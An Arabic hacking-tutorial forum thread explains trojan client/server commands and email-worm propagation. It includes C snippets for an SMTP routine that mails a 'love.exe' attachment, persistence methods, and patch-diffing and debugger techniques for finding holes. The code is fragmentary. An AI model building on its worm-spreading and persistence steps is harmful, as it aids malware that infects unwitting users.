JAAS

تعلم التجسس والإختراق (بطريقة الخبراء)

27 ردود في هذا الموضوع

مرحبا...

أمن المعلومات من المواضيع المهمة في عالم الكمبيوتر وأعتقد أنة سيصبح أهم موضوع يشغل بال المهتمين

بالكمبيوتر في السنوات المقبلة والسبب تطور أساليب القرصنة وإتساع مجالها

قبل يومين تقريبا أردت تحديث نظام تشغيل لم أستخدمة منذ فترة وعندما بحثت عن التحديثات الجديدة

وجدت 60 تحديث جديد منهم 56 في الأمن؟؟ وطبعا هذا الذي تم إكتشافة في مدة سنة ونصف والذي لم يكتشف أعظم

على ماذا يدل هذا في رأيك بكل بساطة يدل على كارثة تهدد كل من يعتمد على الكمبيوتر في تجارة

أو صناعة أو معلومات والدليل قبل فترة بسيطة خسائر موقع جوجل ملايين الدولارات لأنة أعتمد

على التقنية وفتح مزاد علني على الإنترنت.

ما يهمنا من هذة المقدمة أنا الشغلة خطيرة و معقدة وحيرت الخبراء ولكن كيف

كما تعودنا دائما نبدأ من الأسهل ثم الأعقد وسيكون الشرح بالترتيب التالي:

الإختراق عن طريق ملفات التجسس (كيف تعمل ملفات التجسس)

الإختراق عن طريق فايروسات البريد(كيف تعمل فايروسات البريد)

الإختراق عن طريق ثغرات الأنظمة ( كيف تخترق الأنظمة)

الإختراق عن طريق تقنيات الإتصالات السلكية والاسلكية (إصطياد المعلومات)

أولا: ملفات التجسس

هذة الطريقة أسهل طريقة وأشهر طريقة والمعروفة عند أغلب الأعضاء

وتتم كالتالي

إرسال الخادم إلى الضحية - الإتصال بالخادم - إرسال المعلومات للخادم

ولكني سأخرج عن الروتين المتبع في شرح الإختراق وسأشرح كيف تعمل هذة البرامج

الخادم

بكل بساطة الخادم عبارة عن برنامج يفتح منفذ في الجهاز لتلقي الأوامر من برنامج خارجي لتنفيذها على الجهاز

فمثلا لفتح السيدي برنامج الإختراق يرسل معلومة إلى الخادم أي معلومة يحددها المبرمج ولتكن

0xAA

ويتم إرسالها بالطريقة التالية

send(s,(char*)0xAA,1,0);

وعندما يستقبلها الخادم يقارن ما هي التعليمة وينفذ الكود المطلوب بهذة الطريقة

DWORD cmd;
char rcv[10];
recv(s,rcv,10,0);
sscanf(rcv,"%X",&cmd);

switch(cmd)
{
......
......
case 0xAA:
mciSendString("set cdaudio door open",szbuf,255,hwnd);
break;
....
....
}

والي أريد أوصلة إن برنامج الإختراق لا ينفذ أي شيء وإنما الخادم بة كل دوال التنفيذ ولذالك تجد الخادم أكبر في الحجم

فكرة الخادم عن طريق الدوال

listen

recv

فكرة برنامج الإختراق عن طريق الدوال

connect

send

وللزيادة فكرة محرر الخادم

CreateFileMapping

MapViewOfFile

أعتقد هذا الموضوع يحتاج مثال وسأضع مثال لبرنامج تجسس إذا وافق المشرفين عن المنتدى

وثاني شيء لا نريد التعمق في هذا الموضوع لأنة من المواضع القديمة جداا

وخلونا نواكب العصر ونهتم بالجديد في عالم الهكر

ثانيا: فايروسات البريد

وهي أكثر الفايروسات إنتشارا في العالم لأنها ذكية وذاتية الإنتشار

لتشريح هذا النوع من الفايروسات لازم نأخذة من عدة نواحي

كيف ينشر نفسة و كيف يشغل نفسة بنفسة

طريقة إنتشارة

بعد ما يصمم المبرمج هذا الفايروس يقوم من مكان مجهول بإرسال هذا الفايروس إلى عدد من الإيميلات

وبعدة ينسى أمرة لأن الفايروس سيقوم بنشر نفسة

عندما يشغل أي مستخدم الفايروس بعد أن يستقبلة من البريد تحدث أمور كثيرة

أول ماظهرت هذة الفايروسات كانت تقوم بعمل واحد البحث عن عنواين البريد في الجهاز الضحية

إما أن تكون في دفتر العناوين أو في برنامج البريد وبعدها يرسل نفسة إلى هذة العناوين

وبعد فترة تطورت هذة الفايروسات وصارت طريقة عملها بهذا الشكل

يقوم الفايروس بالبحث عن العناوين في سيرفرات مشهورة مثل

سيرفر الشات أو سيرفر البريد أو قوائم البريد في بعض المواقع

ولكن كيف يقوم بالبحث وإرسال نفسة وكيف يعرف بروتوكولات البريد؟

smpt,pop3

الجواب

لو نرجع لدراست الشبكات والبروتوكولات لوجدنا موضوع مهم نظام أسماء المجالات

DNS

ينقسم هذا المجال لعدة أقسام ما يهمنا في هذا الدرس هو قسم

MX

ومعناة تبادل الرسائل

Mail Exchange

هذا القسم عبارة عن عناوين تبادل الرسائل في سيرفر البريد

لو نلاحظ موقع ياهو يحتوي سجل تبادل الرسائل على العناوين التالية

-------------------------------------------------------------------

yahoo.com MX preference = 1, mail exchanger = mx2.mail.yahoo.c

yahoo.com MX preference = 5, mail exchanger = mx4.mail.yahoo.c

yahoo.com MX preference = 1, mail exchanger = mx1.mail.yahoo.c

yahoo.com nameserver = ns1.yahoo.com

yahoo.com nameserver = ns2.yahoo.com

yahoo.com nameserver = ns3.yahoo.com

yahoo.com nameserver = ns4.yahoo.com

yahoo.com nameserver = ns5.yahoo.com

mx2.mail.yahoo.com internet address = 64.156.215.5

mx2.mail.yahoo.com internet address = 64.156.215.6

mx4.mail.yahoo.com internet address = 216.136.129.15

mx4.mail.yahoo.com internet address = 66.218.86.254

mx4.mail.yahoo.com internet address = 216.136.129.17

mx4.mail.yahoo.com internet address = 66.218.86.253

mx4.mail.yahoo.com internet address = 216.136.129.18

mx1.mail.yahoo.com internet address = 64.157.4.82

mx1.mail.yahoo.com internet address = 64.157.4.83

mx1.mail.yahoo.com internet address = 64.157.4.84

mx1.mail.yahoo.com internet address = 64.156.215.5

ns1.yahoo.com internet address = 66.218.71.63

ns2.yahoo.com internet address = 66.163.169.170

ns3.yahoo.com internet address = 217.12.4.104

ns4.yahoo.com internet address = 63.250.206.138

ns5.yahoo.com internet address = 64.58.77.85

-----------------------------------------------------------------------------------------

بمعنى أن هذة العناوين

mx1.mail.yahoo.com

mx2.mail.yahoo.com

mx3.mail.yahoo.com

mx4.mail.yahoo.com

عناوين السيرفر الذي يقوم بتبادل الرسائل

وتستطيع عرض سجل البريد لأي موقع عن طريق برنامج الدوس وبهذة الطريقة

nslookup mx yahoo.com

وبعد أن يقوم الفايروس بإظهار عنوان السيرفر يرسل نفسة

أول شيء يقوم بة بناء رسالة تحتوي على ملف مرفق بهذة الطريقة

char szRcv[MAX_PATH]

//// HELO
strcpy(szRcv,"HELO Yahoo\r\n");
send(sct,szRcv,strlen(szRcv),0);
recv(sct,szRcv,MAX_PATH,0);

// MAIL FROM:
strcpy(szRcv,"MAIL FROM: <[email protected]>\r\n");
send(sct,szRcv,strlen(szRcv),0);
recv(sct,szRcv,MAX_PATH,0);

//// RCPT TO:
strcpy(szRcv,"RCPT TO: <[email protected]>\r\n");
send(sct,szRcv,strlen(szRcv),0);
recv(sct,szRcv,MAX_PATH,0);

//// DATA
strcpy(szRcv,"DATA\r\n");
send(sct,szRcv,strlen(szRcv),0);
recv(sct,szRcv,MAX_PATH,0);
----------------------------------------
//Build Mail
ZeroMemory(szRcv,MAX_PATH);
strcpy(szRcv,"From: [email protected]\r\nTo: [email protected]\r\nDate: 2004\r\nSubject: Ilove You\r\n");

strcpy(BualdMsg,szRcv);
strcat(BualdMsg,"Rq-Mail: WC Mail\r\n");
strcat(BualdMsg,"MIME-Version: 1.0\r\n");
strcat(BualdMsg,"Content-Type: multipart/mixed; boundary=WC_MAIL_PaRt_BoUnDaRy_5168011\r\n\n");
strcat(BualdMsg,"This is a multi-part message in MIME format.\r\n\n");
//
strcat(BualdMsg,"--WC_MAIL_PaRt_BoUnDaRy_5168011\r\n");
strcat(BualdMsg,"Content-Type: text/plain\r\n");
strcat(BualdMsg,"Content-Transfer-Encoding: 7Bit\r\n\n");
strcat(BualdMsg,"body mail\r\n");

//
strcat(BualdMsg,"--WC_MAIL_PaRt_BoUnDaRy_5168011\r\n");
strcat(BualdMsg,"Content-Type:application/octet-stream; file=love.exe\r\n");
strcat(BualdMsg,"Content-Transfer-Encoding: base64\r\n");
strcat(BualdMsg,"Content-Disposition: attachment; filename=love.exe\r\n\n");
strcat(BualdMsg,"EXE Code");
strcat(BualdMsg,"\r\n\n");
strcat(BualdMsg,"--WC_MAIL_PaRt_BoUnDaRy_5168011--\r\n");

strcat(BualdMsg,"\r\n.\r\n");

//Send File
send(sct,BualdMsg,strlen(BualdMsg),0);
recv(sct,szRcv,MAX_PATH,0);

ولكن يجب أن تنتبة لهذة الكلمة في الكود

EXE Code

هذا الكلمة توضع مكانها شفرة الفايروس بعد التشفير

ويتم تشفير الملف بعدة طرق وقانون التشفير هو

Code<<= 8;
Code |= (indexCode & 0xff);
Code += 8;

وبعدها يتم الإرسال

هذة بكل بساطة دورة تكاثر الفايروس وإنتشارة

أما عن طريقة تشغيل نفسة فالمسألة بسيطة جدا

عن طريق

الريجستري

عن طريق ملفات التأسيس

كتابة نفسة في مقدمة البرامج

كتابة نفسة في قطاع الإقلاع في القرص الصلب

هذة الطرق في الإختراق لا تعتبر مشكلة وقد وجد لها حلول قد

تكون مفيدة والهدف من شرحها أن تكون مقدمة للدروس القادمة

التي ستتعلم بعدها أمور يجهلها الكثييير في الأمن والحماية ولا يوجد لها حلول إلى وقتنا الحالي

وإنتظرو للموضوع بقية

----------------------

أي إستفسار عن الدرس السابق تفضل بكتابتة

---------------------

هذا والله أعلم

1

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

بارك الله فيك يا jaas، والان مايكروسوفت تعدنا ب SP2 لانهاء هذه المشاكل وهذا من موقعها فهل تصدق هذه المرة؟؟؟

XPSP2.jpg

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

والله شيء رائع SP2 ولكن

لكل حادث حديث

أنا أعتقد أنا قصة SP2

ليست للحماية من الإختراق ولكن لحماية النظام وندوز من القرصنة

نسبة كبيرة من مستخدمي وندوز أنظمتهم غير قانونية

وعندما يحاولو تركيب sp2 تظهر رسالة نظامك غير قانوني

وبمعنى آخر إشتري وندوز أصلي تجد حماية وندوز مقرصن لا تجد حماية

وهذا لتبرير بعض أخطاء النظام

والله أعلم

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

اعتقد انها وجه نظر .. و لكني من استخدامي للنسخة البيتا من ال SP2 اعتقد انها توفر حماية اكثر من جيدة علي غير المعتاد في نظم ويندوز ..

و هذه مجرد وجه نظر .. و ستظهر الايام اذا كانت ميكروسوفت صادقة ام كالمعتاد ...

و تحياتي ...

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

تكملة الموضوع

ثالثا : ثغرات الأنظمة

مرحبا

تكلمنا في الموضوع السابق وذكرنا نقطة مهمة وهي

أن الطرق السابقة وجد لها حل شبة كامل ولا تمثل خطر كبير بالنسبة لأمن الشركات

والشبكات الضخمة

أما هذا الموضوع ثغرات الأنظمة

فهو أساس المشكلة ولا يوجد لة حل إلى وقتنا الحالي

لفهم الثغرات لا حظ هذة التعاريف

المنفذ : هو عبارة عن بوابة لتبادل المعلومات

بين جهازك والأجهزة على شبكة الإنترنت يستخدمها نظام التشغيل والبرامج

مثلا : تصفح الإنترنت عبر منفذ - برامج البريد تقرأ البريد عبر منفذ -الشات والماسنجر لة منفذ

الميديا بلير والوسائط لها منافذ - تحديث النظام لة منفذ.

كل برنامج لة علاقة بالإتصالات والإنترنت لة منفذ

ما رأيك: هل تعتقد أن النظام يقدر يتخلى عن الإتصالات؟؟ أكيد لا مافائدتة بدون إتصالات

إذن لن يكون هنالك أمان تثق بة .

كيف تصدق أنة يوجد أمان

تخيل شيء مهم مثل بنك لة أكثر من باب مفتوح كيف تريد الحرامي ما يدخل ؟!!

وأنا أعتقد أنة لا يوجد لهذة المسألة حل

إما أن يتخلى النظام عن الإنترنت ؟ وهذا مستحيل

أو أن تظهر معجزة ؟ وهذا شبة مستحيل

وهذا بالضبط ما حير العالم

لاحظ هذا التعريف

الثغرة: هي عبارة عن فهم عمل منفذ ما ماذا يرسل وماذا يستقبل

وإستغلالة للدخول للنظام أو زرع برامج خاصة للتجسس وإدخالة عبر هذا المنفذ

كيف؟

لاحظ في الدرس السابق شرحنا برامج التجسس المعروفة وشرحنا عمل الخادم

يقوم البرنامج بإرسال تعليمة عبر منفذ للخادم يقوم الخادم بتحليلها ومعرفتها وينفذ المطلوب

ولكن لو كان الخادم لا يفهمك؟ ولا يعرف ماتريد القيام بة ؟ ماذا تفعل

الحل بسيط : تتعلم أنت لغتة وماذا يفعل تخلية يقوم بما تريد!!

هذا هو إكتشاف الثغرات

أنواع الثغرات

نوع الثغرة هو نفسة نوع المنفذ التي يتم إكتشاف الثغرة فية

والمنافذ لها نوعين

منفذ دائم : وهو الي يشتغل مع إشتغال برنامج ما

هل تريد أن ترى المنافذ الدائمة في جهازك لا تنسى تقول ماشاء الله اللهم زد وبارك

شغل الدوس وأكتب

netstat -a -n -o

تظهر لك قائمة طويلة عريضة - المنفذ يأتي بعد عنوان الجهاز و علامة: بهذا الشكل

127.0.0.1:587

منفذ = 587

أما آخر قائمة التي عنوانها PID

فهي رقم العملية(البرنامج) في الذاكرة التي يستقبل الأوامر من المنفذ

والنوع الثاني : الثغرات المؤقتة = المنافذ المؤقتة

في بعض العمليات التي تتم على الإنترنت تكون بشكل مؤقت

مثلا لتحميل أداة أكتف إكس نحتاج لمنفذ لنقل الأداة من الشبكة إلى الجهاز

تتطلب بعض السكربتات وخاصة الكبيرة منفذ للنقل وسرعة التنفيذ

تتطلب بعض برامج قرائة البريد مثل الأوت لوك منفذ مؤقت للرد المباشر على الرسائل

هذي كلها منافذ مؤقتة ينشأها النظام في وقت معين وبعد التنفيذ يغلق المنفذ وتكون مخفية

للمعلومة : كل الثلاث منافذ التي تم عرضها ظهر فيها ثغرات وتم تعديلها

هذا بالنسبة لأنواع الثغرات يمكن تكون في أنواع ثانية الله أعلم

طريقة إكتشاف الثغرات

في أكثر من طريقة: الأولى

إسمع القصة وبتفهم أول طريقة

قبل فترة جمعت كل تحديثات الأمان مع بعض وأردت أركبها في نظام قديم

قلت بجرب وبكتشف كيف تعمل هذة التحديثات تغلق ماذا وتفتح ماذا

بدأت أشغل كل تحديث ببرنامج تصحيح للخطاء( الديبغر) وأسجل ملاحظات

وأعيد تشغيل الكمبيوتر وأفتح الدوس وأكتب

netstat -a -n -o

والله السالفة طلعت تشبة لعبة الشرطي والحرامي

قبل تثبيت أي تحديث كان عدد المنافذ 12 وبأرقام مختلفة طبعا

بعد تثبيت التحديثات صارت المنافذ 9 وعناوين المنافذ نفس ماهي أقصد أول تسعة

بديت أثبت واحد ورى الثاني ويتم التغيير كما يلي

تقوم بعض التحديثات بعمل مشاركة بين منفذ تم إكتشاف ثغرة فية وبين آخر سليم

مع تعديل في الكود

طريقة مشاركة المنافذ تخلي النظام بطي + أن الي أكتشف الثغرة

سهل يحمل التحديث ويشوف التعديل وبترجع الثغرة زي ماكانت

قلت في بالي والله إن القراصنة عقدوا مايكروسفت وبتكون نهاية الشركة على أيديهم ؟

أعتقد فهمت أول طريقة وهي تحميل تحديث لثغرة وتقوم بتنقيح هذا التحديث لتعرف الثغرة

مثل الي يريد يتعلم كسر حماية برنامج يدور لة على كراك وبعد ما يكسر البرنامج يشوف الفرق قبل وبعد

لا تتوقوعوا إن لينكس فقط مفتوح المصدر أيضا وندوز مفتوح المصدر ولكن بطريقة ملتوية فك التجميع

قد تكون هذة الطريقة أسهل طريقة ولكن الثغرة تكون قد أغلقت؟ولكن تستفيد منها في إكتشاف ثغرة جديدة

الطريقة الثانية

ببرامج التنقيح أيضا : لتحميل برنامج تنقيح محترم

http://home.t-online.de/home/Ollydbg

حدد البرنامج الذي يفتح ثغرة دائمة أو مؤقتة

إفتح البرنامج وسوي تخطيط للذاكرة للتعرف على كل الملفات التي تتعلق بهذا البرنامج

مثل ماتلاحظ: تخطيط لبرنامج 40 بالمئة من تحديثات الأمان عند التحديث كانت فية

ما أدري الكود الي هنا ليش ما ظهر  يمكن يكون أكبر من الصفحة

كل ملف تجدة في القائمة إفتحة وضع نقاط توقف على كل دوال الإتصالات

طبعا بعض الملفات معروفة ولا تخص البرنامج مثل المكاتب

user32.dll ,kernel32

وباقي ملفات النظام القياسية ركز على ملفات البرنامج الملفات الغريبة؟

وشغل البرنامج وإتصل بالإنترنت وتجول على كيفك حمل برامج سوي أي شيء

أول ما تلاقي برنامج التنقيح عطاك إشارة أنة دالة عليها نقطة توقف تحاول الإتصال

وقف وإفتح البرنامج وتتبع البرنامج قد تلاقي شيء أو بعض هذة الأفكار

إستقبال حجم كبير من المعلومات يكفي لنقل فايروس بشكل غير مشروط جداا

فتح منافذ مؤقتة جديدة

أو أي طريقة لزرع ملف تجسس

طبعا لازم تكون ذكي وعندك خبرة في البرمجة لإكتشاف هذي الشغلات وأهم شيء عندك صبر وإرادة

وإذا ما لقيت شيء كمل حتى تلاقي : لايمكن أن تلاقيها في يوم وليلة

هذي البرامج مصممة ومجربة على يد خبراء برمجة وأمن مو حيالله

وللمعلومة : أغلب الثغرات تكتشف في 3 إلى 6 أشهر من التدقيق والمراقبة

المهم : هذي الطريقة هي أكثر الطرق المتبعة لإكتشاف للثغرات

الطريقة الثالثة

مراقبة مخزن بيانات المودم + إتصالات المودم

قد تكون هذة الطريقة مقدمة للدرس القادم : قراصنة الإتصالات السلكية والاسلكية

نبدأ :في برامج كثيرة لمراقبة مخزن المودم + مراقبة تعليمات المودم AT

وهذا واحد منها

http://www.hhdsoftware.com/sermon.html

قبل أن تتصل بالنت شغل البرنامج وإختر ملف ثم جلسة جديدة

تظهر لك خيارت المراقبة إختر لأولى منفذ تسلسلي

تظهر لك خيارت للمنفذ إختر منها منفذ المودم

ثم تظهر لك خيارات التعليمات التي تريد إظهارها حدد أول خمس

بعد ذلك صغر البرنامج وإتصل بالنت و عند الإتصال إطلع على البرنامج

لاحظ البرنامج المستخدم في الإتصال+ لاحظ كيف يتم نقل المعلومات + لاحظ تعليمات المودم

كما هو موضح في الصورة

smmon.gif

المعلومات التي تشوفها في الصورة

يحتاج لها درس خاص وإن شاء الله نتطرق لها في الدرس القادم

المهم : هذة بعض الطرق لإكتشاف ثغرات النظام وماخفي كان أعظم

وفي شيء آخر : لا تتوقع أن نظام التشغيل وندوز نظام غير آمن

بل أعتقد أنة أأمن نظام تشغيل معروف في العالم. ولو أن أي نظام تشغيل ثاني تعرض

لمحاولات قرصنة مثل نظام وندوز لكان الآن في عداد الأموات

وستضل الحرب بين الأمن والإختراق . إلى أن يشاء الله

ثانيا : نظام لينكس

نظام لينكس أمام هذة الطرق في كشف الثغرات يعتبر شيء سخيف

لو تريد كشف ثغرة في لينكس بكل بساطة لا تحتاج لكل هذة الطرق والبرامج

بل تحتاج لبرنامج واحد فقط وهو ( محرر نصوص)؟؟؟؟؟؟؟؟؟؟؟؟

لكي تفتح الشفرة المصدرية للينكس وترى بعينك كيفية تصميم طرق الأمن فية

وتكتشف الثغرة

أخيرا: أنا لا أقصد من كل هذا الدرس أن كشف ثغرات الأنظمة شيء بسيط

كشف الثغرات والله شيء معقد وكأنك صححت خطأ في نظام تشغيل؟؟ غفل عنة خبراء برمجة

هذا ما أعتقدة والله أعلم

تم تعديل بواسطه jaas
0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

والله تعقدت لين ما دخلت هذا الكود

وأقول ( إختراق أنظمة) خلنا نتعلم نتكتب في المنتديات وبعدين نخترق الأنظمة

مجرد مزحة

Memory map
Address    Size       Owner      Section    Contains                    Type             Access          Initial   Mapped as
00010000   00001000                                                     Priv 00021004    RW              RW
00020000   00001000                                                     Priv 00021004    RW              RW
0006B000   00001000                                                     Priv 00021104    RW  Guarded     RW
0006C000   00004000                         stack of main thread        Priv 00021104    RW  Guarded     RW
00070000   00001000                                                     Map  00041002    R               R
00080000   00026000                                                     Priv 00021004    RW              RW
00180000   00006000                                                     Priv 00021004    RW              RW
00190000   00001000                                                     Map  00041004    RW              RW
001A0000   00016000                                                     Map  00041002    R               R
001C0000   00034000                                                     Map  00041002    R               R
00200000   00041000                                                     Map  00041002    R               R
00250000   00006000                                                     Map  00041002    R               R
00260000   00002000                                                     Map  00041020    R E             R E
00320000   00002000                                                     Map  00041020    R E             R E
00330000   00103000                                                     Map  00041002    R               R
00440000   00008000                                                     Priv 00021004    RW              RW
00450000   00006000                                                     Map  00041020    R E             R E
004D0000   00001000                                                     Priv 00021004    RW              RW
004E0000   00001000                                                     Priv 00021004    RW              RW
0052B000   00001000                                                     Priv 00021104    RW  Guarded     RW
0052C000   00004000                         stack of thread 00000318    Priv 00021104    RW  Guarded     RW
00530000   00005000                                                     Priv 00021004    RW              RW
00540000   00003000                                                     Map  00041002    R               R
00550000   00003000                                                     Priv 00021004    RW              RW
00590000   00001000                                                     Priv 00021004    RW              RW
00610000   00002000                                                     Map  00041002    R               R
00620000   00002000                                                     Map  00041002    R               R
00630000   0000C000                                                     Priv 00021004    RW              RW
00640000   00002000                                                     Map  00041002    R               R
0068B000   00001000                                                     Priv 00021104    RW  Guarded     RW
0068C000   00004000                         stack of thread 0000034C    Priv 00021104    RW  Guarded     RW
006CB000   00001000                                                     Priv 00021104    RW  Guarded     RW
006CC000   00004000                         stack of thread 000005C4    Priv 00021104    RW  Guarded     RW
006D0000   00008000                                                     Map  00041004    RW              RW
006E0000   00004000                                                     Map  00041004    RW              RW
006F0000   00004000                                                     Map  00041004    RW              RW
0073B000   00001000                                                     Priv 00021104    RW  Guarded     RW
0073C000   00004000                         stack of thread 000003D4    Priv 00021104    RW  Guarded     RW
00770000   00002000                                                     Map  00041002    R               R
007BB000   00001000                                                     Priv 00021104    RW  Guarded     RW
007BC000   00004000                         stack of thread 000003D8    Priv 00021104    RW  Guarded     RW
007FB000   00001000                                                     Priv 00021104    RW  Guarded     RW
007FC000   00004000                         stack of thread 000003DC    Priv 00021104    RW  Guarded     RW
0083B000   00001000                                                     Priv 00021104    RW  Guarded     RW
0083C000   00004000                         stack of thread 000005C8    Priv 00021104    RW  Guarded     RW
0087B000   00001000                                                     Priv 00021104    RW  Guarded     RW
0087C000   00004000                         stack of thread 000005D0    Priv 00021104    RW  Guarded     RW
008BB000   00001000                                                     Priv 00021104    RW  Guarded     RW
008BC000   00004000                         stack of thread 000005D4    Priv 00021104    RW  Guarded     RW
008FB000   00001000                                                     Priv 00021104    RW  Guarded     RW
008FC000   00004000                         stack of thread 000005D8    Priv 00021104    RW  Guarded     RW
0093B000   00001000                                                     Priv 00021104    RW  Guarded     RW
0093C000   00004000                         stack of thread 000005DC    Priv 00021104    RW  Guarded     RW
0097B000   00001000                                                     Priv 00021104    RW  Guarded     RW
0097C000   00004000                         stack of thread 00000178    Priv 00021104    RW  Guarded     RW
01000000   00001000   svchost               PE header                   Imag 01001002    R               RWE
01001000   00003000   svchost    .text      code,imports                Imag 01001002    R               RWE
01004000   00001000   svchost    .data      data                        Imag 01001002    R               RWE
01005000   00001000   svchost    .rsrc      resources                   Imag 01001002    R               RWE
5A6E0000   00001000   webclnt               PE header                   Imag 01001002    R               RWE
5A6E1000   0000D000   webclnt    .text      code,imports,exports        Imag 01001002    R               RWE
5A6EE000   00004000   webclnt    .data      data                        Imag 01001002    R               RWE
5A6F2000   00001000   webclnt    .rsrc      resources                   Imag 01001002    R               RWE
5A6F3000   00001000   webclnt    .reloc     relocations                 Imag 01001002    R               RWE
5AD70000   00001000   uxtheme               PE header                   Imag 01001002    R               RWE
5AD71000   0002C000   uxtheme    .text      code,imports,exports        Imag 01001002    R               RWE
5AD9D000   00001000   uxtheme    .data      data                        Imag 01001002    R               RWE
5AD9E000   00004000   uxtheme    .rsrc      resources                   Imag 01001002    R               RWE
5ADA2000   00002000   uxtheme    .reloc     relocations                 Imag 01001002    R               RWE
5B0A0000   00001000   umdmxfrm              PE header                   Imag 01001002    R               RWE
5B0A1000   00003000   umdmxfrm   .text      code,imports,exports        Imag 01001002    R               RWE
5B0A4000   00001000   umdmxfrm   .data      data                        Imag 01001002    R               RWE
5B0A5000   00001000   umdmxfrm   .rsrc      resources                   Imag 01001002    R               RWE
5B0A6000   00001000   umdmxfrm   .reloc     relocations                 Imag 01001002    R               RWE
5CD70000   00001000   serwvdrv              PE header                   Imag 01001002    R               RWE
5CD71000   00003000   serwvdrv   .text      code,imports,exports        Imag 01001002    R               RWE
5CD74000   00001000   serwvdrv   .data      data                        Imag 01001002    R               RWE
5CD75000   00001000   serwvdrv   .rsrc      resources                   Imag 01001002    R               RWE
5CD76000   00001000   serwvdrv   .reloc     relocations                 Imag 01001002    R               RWE
629C0000   00001000   LPK                   PE header                   Imag 01001002    R               RWE
629C1000   00004000   LPK        .text      code,imports,exports        Imag 01001002    R               RWE
629C5000   00001000   LPK        .data      data                        Imag 01001002    R               RWE
629C6000   00001000   LPK        .rsrc      resources                   Imag 01001002    R               RWE
629C7000   00001000   LPK        .reloc     relocations                 Imag 01001002    R               RWE
71950000   00001000   comctl32              PE header                   Imag 01001002    R               RWE
71951000   00088000   comctl32   .text      code,imports,exports        Imag 01001002    R               RWE
719D9000   00001000   comctl32   .data      data                        Imag 01001002    R               RWE
719DA000   00054000   comctl32   .rsrc      resources                   Imag 01001002    R               RWE
71A2E000   00006000   comctl32   .reloc     relocations                 Imag 01001002    R               RWE
71A50000   00001000   mswsock               PE header                   Imag 01001002    R               RWE
71A51000   00026000   mswsock    .text      code,imports,exports        Imag 01001002    R               RWE
71A77000   0000C000   mswsock    SANONTCP   code                        Imag 01001002    R               RWE
71A83000   00002000   mswsock    .data      data                        Imag 01001002    R               RWE
71A85000   00003000   mswsock    .rsrc      resources                   Imag 01001002    R               RWE
71A88000   00003000   mswsock    .reloc     relocations                 Imag 01001002    R               RWE
71A90000   00001000   wshtcpip              PE header                   Imag 01001002    R               RWE
71A91000   00004000   wshtcpip   .text      code,imports,exports        Imag 01001002    R               RWE
71A95000   00001000   wshtcpip   .data      data                        Imag 01001002    R               RWE
71A96000   00001000   wshtcpip   .rsrc      resources                   Imag 01001002    R               RWE
71A97000   00001000   wshtcpip   .reloc     relocations                 Imag 01001002    R               RWE
71AA0000   00001000   WS2HELP               PE header                   Imag 01001002    R               RWE
71AA1000   00004000   WS2HELP    .text      code,imports,exports        Imag 01001002    R               RWE
71AA5000   00001000   WS2HELP    .data      data                        Imag 01001002    R               RWE
71AA6000   00001000   WS2HELP    .rsrc      resources                   Imag 01001002    R               RWE
71AA7000   00001000   WS2HELP    .reloc     relocations                 Imag 01001002    R               RWE
71AB0000   00001000   WS2_32                PE header                   Imag 01001002    R               RWE
71AB1000   00011000   WS2_32     .text      code,imports,exports        Imag 01001002    R               RWE
71AC2000   00001000   WS2_32     .data      data                        Imag 01001002    R               RWE
71AC3000   00001000   WS2_32     .rsrc      resources                   Imag 01001002    R               RWE
71AC4000   00001000   WS2_32     .reloc     relocations                 Imag 01001002    R               RWE
71AD0000   00001000   wsock32               PE header                   Imag 01001002    R               RWE
71AD1000   00003000   wsock32    .text      code,imports,exports        Imag 01001002    R               RWE
71AD4000   00003000   wsock32    .rsrc      data,resources              Imag 01001002    R               RWE
71AD7000   00001000   wsock32    .reloc     relocations                 Imag 01001002    R               RWE
71BF0000   00001000   SAMLIB                PE header                   Imag 01001002    R               RWE
71BF1000   0000D000   SAMLIB     .text      code,imports,exports        Imag 01001002    R               RWE
71BFE000   00001000   SAMLIB     .data      data                        Imag 01001002    R               RWE
71BFF000   00001000   SAMLIB     .rsrc      resources                   Imag 01001002    R               RWE
71C00000   00001000   SAMLIB     .reloc     relocations                 Imag 01001002    R               RWE
71C20000   00001000   NETAPI32              PE header                   Imag 01001002    R               RWE
71C21000   00047000   NETAPI32   .text      code,imports,exports        Imag 01001002    R               RWE
71C68000   00003000   NETAPI32   .data      data                        Imag 01001002    R               RWE
71C6B000   00001000   NETAPI32   .rsrc      resources                   Imag 01001002    R               RWE
71C6C000   00003000   NETAPI32   .reloc     relocations                 Imag 01001002    R               RWE
72FA0000   00001000   USP10                 PE header                   Imag 01001002    R               RWE
72FA1000   0003A000   USP10      .text      code,imports,exports        Imag 01001002    R               RWE
72FDB000   00009000   USP10      .data      data                        Imag 01001002    R               RWE
72FE4000   00002000   USP10      Shared                                 Imag 01001002    R               RWE
72FE6000   00012000   USP10      .rsrc      resources                   Imag 01001002    R               RWE
72FF8000   00002000   USP10      .reloc     relocations                 Imag 01001002    R               RWE
74C10000   00001000   ssdpsrv               PE header                   Imag 01001002    R               RWE
74C11000   00009000   ssdpsrv    .text      code,imports,exports        Imag 01001002    R               RWE
74C1A000   00001000   ssdpsrv    .data      data                        Imag 01001002    R               RWE
74C1B000   00001000   ssdpsrv    .rsrc      resources                   Imag 01001002    R               RWE
74C1C000   00001000   ssdpsrv    .reloc     relocations                 Imag 01001002    R               RWE
74C20000   00001000   regsvc                PE header                   Imag 01001002    R               RWE
74C21000   0000C000   regsvc     .text      code,imports,exports        Imag 01001002    R               RWE
74C2D000   00001000   regsvc     .data      data                        Imag 01001002    R               RWE
74C2E000   00001000   regsvc     .rsrc      resources                   Imag 01001002    R               RWE
74C2F000   00001000   regsvc     .reloc     relocations                 Imag 01001002    R               RWE
74C40000   00001000   lmhsvc                PE header                   Imag 01001002    R               RWE
74C41000   00002000   lmhsvc     .text      code,imports,exports        Imag 01001002    R               RWE
74C43000   00001000   lmhsvc     .data      data                        Imag 01001002    R               RWE
74C44000   00001000   lmhsvc     .rsrc      resources                   Imag 01001002    R               RWE
74C45000   00001000   lmhsvc     .reloc     relocations                 Imag 01001002    R               RWE
76200000   00001000   WININET               PE header                   Imag 01001002    R               RWE
76201000   00079000   WININET    .text      code,imports,exports        Imag 01001002    R               RWE
7627A000   00006000   WININET    .data      data                        Imag 01001002    R               RWE
76280000   00012000   WININET    .rsrc      resources                   Imag 01001002    R               RWE
76292000   00005000   WININET    .reloc     relocations                 Imag 01001002    R               RWE
